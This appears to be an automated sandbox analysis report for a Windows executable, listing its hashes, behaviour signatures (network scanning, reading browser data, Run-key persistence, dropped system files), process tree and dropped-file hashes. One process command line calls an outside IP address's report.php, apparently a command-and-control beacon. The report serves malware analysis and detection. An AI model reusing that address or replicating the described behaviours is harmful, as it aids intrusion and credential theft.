Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    08-05-2024 21:45

General

  • Target

    6707f4bf94da5453439f5be662361a10_NEIKI.exe

  • Size

    333KB

  • MD5

    6707f4bf94da5453439f5be662361a10

  • SHA1

    f10ce9409c260d703058fa8228d432e35a212eaf

  • SHA256

    be2b45e4f97d74582a0529cc64da0acda4bdcbcc1298161b0d34b2bae832d3ee

  • SHA512

    06c462b1627ee6fc19757bffd3c24ff4cbb00331d7de5d4d6202b1e5f1e27aa2643b05dda048aba2ea9a9f08b32dc14e586a76ca324c4b4e13c4d29a08c2fc58

  • SSDEEP

    6144:ppMM8EV1ODepMM8CrjFyfjn0sfiUBpqpebi3vmnFn4lAVC9O5j:UxRinFyfr0sfbLi3vmF6Pij

Malware Config

Signatures

  • Contacts a large (1426) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6707f4bf94da5453439f5be662361a10_NEIKI.exe
    "C:\Users\Admin\AppData\Local\Temp\6707f4bf94da5453439f5be662361a10_NEIKI.exe"
    1⤵
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2460
    • C:\Program Files\Internet Explorer\IEXPLORE.exe
      "C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2260
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2260 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2416

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe

    Filesize

    480KB

    MD5

    75dacf6460933bcf9159d520797cd9dc

    SHA1

    33dd26dffe4eda13ba67686055e990356447df1a

    SHA256

    802d443a7e605179b27b28e2b0d106816cd370b88827ab623ae623b1096fbf3a

    SHA512

    ff22a357cc708260ffcdba50c096acd96dc35c8f010c22f5f3cc92cb12f4b506fe63f149619f627c921b7084150dcfb300defa180e7490d1912d75a326647920

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    887e526544d25b6e104b2dbe9367f4c7

    SHA1

    59e8d2aba340a5ecae397f202cfc29cc8f5e184d

    SHA256

    d412e152c6188c2ac8e9db45a9b147bfb72e1cf86b5137c7a4a7e4262536dd1c

    SHA512

    735bef66788f99ef452019f705298b7dc1ff7f1e78ef58e08ad115382afb5bfae3c1c7ca7668d97076332a92cc6e64387ba5f49e00221e2656c8b124a9ae1eee

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    5b77cefd16c42c01928c1f9b5c96918a

    SHA1

    eec4d3846522e55a44b21e675cb667753aa68ad4

    SHA256

    3eb87112157b9e98eae1d444363386dc2e7e852dae2ccf6732afdfb325e3650d

    SHA512

    ad66ab65f0dab0933c3d59828ca164d698f3e178665bfe69a1d98ad62e7d276e08799dfc2d8d977cd73a4a9f215f4a45caa9f21c9c273a69860600e63a0c1bfb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    dc281dc5d6cab53157bf45bc9e214eae

    SHA1

    392084fb07aca955f4118c80e73c9e5240d2ba5a

    SHA256

    35380bc691da0a6d3d6f3cd5b94f15d1c0c94fb61f161da031a35046583f852d

    SHA512

    6ce3e599edb6be3f83b5b6282d4200bc5633eef378e68f665fba1e392e703f37bdde1473cc43be3f8a5c2bd1d11e5a58cbd5850d1a66f4cdc484510191f5c053

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    b5a91c7ce2b0cea193917275fdb903f5

    SHA1

    681a1e772d8231f09cb6a693d05e54f22ee64d5a

    SHA256

    07fc17d8035005cead80c0b8a97f8f2f115cbea82d009403ad737cece73a249e

    SHA512

    3a36630649598d490da46a6e6410d3a34a5fcddf0f9a55cdf8b5ce4f80917eb55be98ff68ebe2b1d26e915e7fa36ac5ee78ffc851315e8a8401ccf859d34d19d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    026243e6f52b84e55cf04e98f1efbb5b

    SHA1

    4d8ca48aca58f5ae0b15437a1372d6423f450154

    SHA256

    16a2b99ca27b234f666ba040f8efd1bc22f2fdf0f631d78e4cbee76e3c0f3716

    SHA512

    a1f3d9842e5acf2cc4b7317dd593c47315387563c3bb37fdae95116444e2d72ce71043fac1f858881eef2ce1926be2cfc0d2fd752d676a70eae8d640e85efc82

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    ca44e3d2cd8bf97ca7daff325da1146d

    SHA1

    32d3af00224b7b0818b4c7242839715d8f877f90

    SHA256

    23fc14df98e74cab36aa40152a005befadeea366b45fabd9bfee067240d155e7

    SHA512

    4bef929f32e4a4fd59fbefcc24c9a24b51663c54eaa77f1012121f2e738f3fdb616b018acfaae07d3c1c0793ed3b4f952f60d5733946c92dbfdf66d557102362

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    166da90e9663f8df5c9a058a4ed360c8

    SHA1

    d21724b0d5b157e0a2b3c6e88fd159838560515e

    SHA256

    5813e20b47736d3d24bf28bfe06ef32d4e4f57a8657ff3dfd0b1230097a66797

    SHA512

    a0ac879189a685e1bce9c0b6c137e07b08e5e5bfd6ee9dba1b429a3808218ad9f92ac460a00c9498f6bd6650b634c49d88c94ad42ed78f327f6f55747a81ef61

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    552602ace4361a4b51068538b73dcb98

    SHA1

    a2eb77fe0a4c73223bd9034763d7c24b8bcec194

    SHA256

    d0bfc14d4d4d16b2073a603420d41ba0e00453588e8d83fb5801c861e70fcb4f

    SHA512

    1be08fade113b6671b5407da405774589455445ce8cf0ecc012ee1c283f5586c61cf05a8ba57b4016597edb5529285bc46f4d3862394d4a67779a1a7dbade128

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    64b47ec4a26d9f3c139db6306027236a

    SHA1

    23f950abbe0e83127026ad62931edfbb45b01cf8

    SHA256

    bb9537ba2d634b844016db539fa056e035588acaeb765d717ebb0f8589e7ce47

    SHA512

    07553b37f84a3031a2683f6d378fca4970bd0f31569332b727f22defa7d795a9394560e647f3ec4b53580a3c65415591f9bece79159133bea2fdf16a4c312702

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    a2c0cd783c276ae7650f49bb87709e55

    SHA1

    18c428446e07adf7c0d63adb73950564a039ed83

    SHA256

    43046a218c798f1a86984149c5d0eabc1157965354b7a4244b4d217af9acbec9

    SHA512

    68c6247453eb0e13787528d2c9817fd24c234b2eacc4c7fe1209bd994c5aea476f549a54ec87e649532142d740053b35a0214fb9719b69466a5fc2d0f5d70c97

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    ce8ba0b7af8f29615d33c122b0b54148

    SHA1

    1d1e4f07de662eaa416023a1d740580591dbe045

    SHA256

    765ffde2e5cf9f7e5f964a53ba88049836f02127e6c39bc1931d6d42be83c40b

    SHA512

    e03ca5ede7596d11b99d98b8a67db0a8d72a27e5699c7e8f0e4fa074fe2458f190f49fa7ffc39ffc410aacd7aa2222ee8fd6b1a1af731a11069c75b0cd7361d2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    07e45eb3f8a0b519f3650b7ec431151a

    SHA1

    dd48c383d85858cdbdcb86403ece99fbd1afb1ed

    SHA256

    14f3aeb62266a589b004c22bd76e87e53020ae09f3217bd4d42c6cc382d21098

    SHA512

    3e39b268b37c42ed03b6f602b303eea410db4ae35f09cfa598c6d613488bd3a572cfcd8ea2ba187947d31526466a6ddd08e2ac392a36393b28c86ee8fe63ad04

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    a8af2243d793019e0605557cf49bb306

    SHA1

    003aa37e0402715ab6ac44cf288c6de59e9391a9

    SHA256

    51231fd288fe6defb2fced10723d9e74e2cf97058c542498f6af506acb36cf55

    SHA512

    ac0d4c87fc2e64ff4ad028d5a10bd438ba18dc408d7fc51f70bc5297a86b211dd06414fe913aa690cec3a034a47d3b4a23afb717814a833073a92d5725bd976a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    2936c1f010c642ec55641567224559b1

    SHA1

    62598c0e46becd5cf7ab9e0941b8572bc3048547

    SHA256

    103b5e1a9533be08107825327a849978b229df05ae0e96978e771f33fd170a57

    SHA512

    2bb18748286289a0117e605401f1132051cad181040219df2326379cbeb576798dad07e35e684220505e819d0a8eb43ddf5af44aed055e3df42fe96c4c00467b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    17b3c7d1ad4ab4a0e99e4528f0695a32

    SHA1

    047cf2bba71a0afbce4f2418f411e5bdb013dd68

    SHA256

    068b7e3ada3fcb30a18587a9b1d978c2b41e0faf692f05fa03db8574f70bc79b

    SHA512

    40716bbef1b497c3d071ca2db34b823cf654c91246bf5df2dc11e9df7b3b2278e2f96f96869344e525c5f566a9198d168396ee605a8afb89329a50c453971385

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    28d62fe7e3ea22c645d3a2e9ed40314a

    SHA1

    3d1a49dde8611dd77c00416133c544c463c8c4b9

    SHA256

    190e35be3102de232d68798b70db7d353797cbe00d32e928c97368e8f7bc7e30

    SHA512

    ce6f9638ce25074a6bab2f7db285c44b2113a4ce5fad57ecaf48c6bf9d9387252e9b43a2f111f5e0d072b7400c20ac403620a26b1a403461b5a65fcd51246723

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    10d86d3f1136844d51fd06605c55d99d

    SHA1

    d0e00802ee5141a09ed747dccbafc45e8a847c98

    SHA256

    15f6d21241ce22ad872f05ef0ecbda6d16fb7ca94885dd295aeaab0154c6f62c

    SHA512

    0309a591b8e4063514e1c13e14dda7a481a879d4e1b9bc3549cdc0138e3d75003b712694cdb4b708087afcee5ebf1bd1bcff6a4023bd88e5efd9a5557b1c0aca

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    582bfd22d9c339b1b12a10713c9f8e5c

    SHA1

    efd5f33f1f35512a09c0e9aab1a9c6fe2fb4cf97

    SHA256

    fbac7631ba7e43d470da9b80d39f56be4e1e19ab4bb2555cf416c6f501e078aa

    SHA512

    c5dbb47b173f46e0be0facf1f899b714cbea87a525da9d258d2c3261efe2dbbac9797c428493749ebbbc655e139d2abb8b725b61ff52695051d129d84aad64a8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    9775d2e08db3493f1bb7bc53d9de8b73

    SHA1

    1528d556a726f90d8215d74a0ba383d1edd89861

    SHA256

    43adeccd8858c05dea753606b81f83fd2c1e6f7d0af20bfb50b2362d7e3484ff

    SHA512

    9de3320df0fd870e591a851bc43b8d1de0bc010b1c9919fbdb1713d747aa4d30f4a90cf6b9319a187d34ec818b1a313e9d6791b778c01124cddd3d11a062372c

  • C:\Users\Admin\AppData\Local\Temp\Cab4415.tmp

    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\Local\Temp\Tar4476.tmp

    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • memory/2460-8039-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2460-0-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB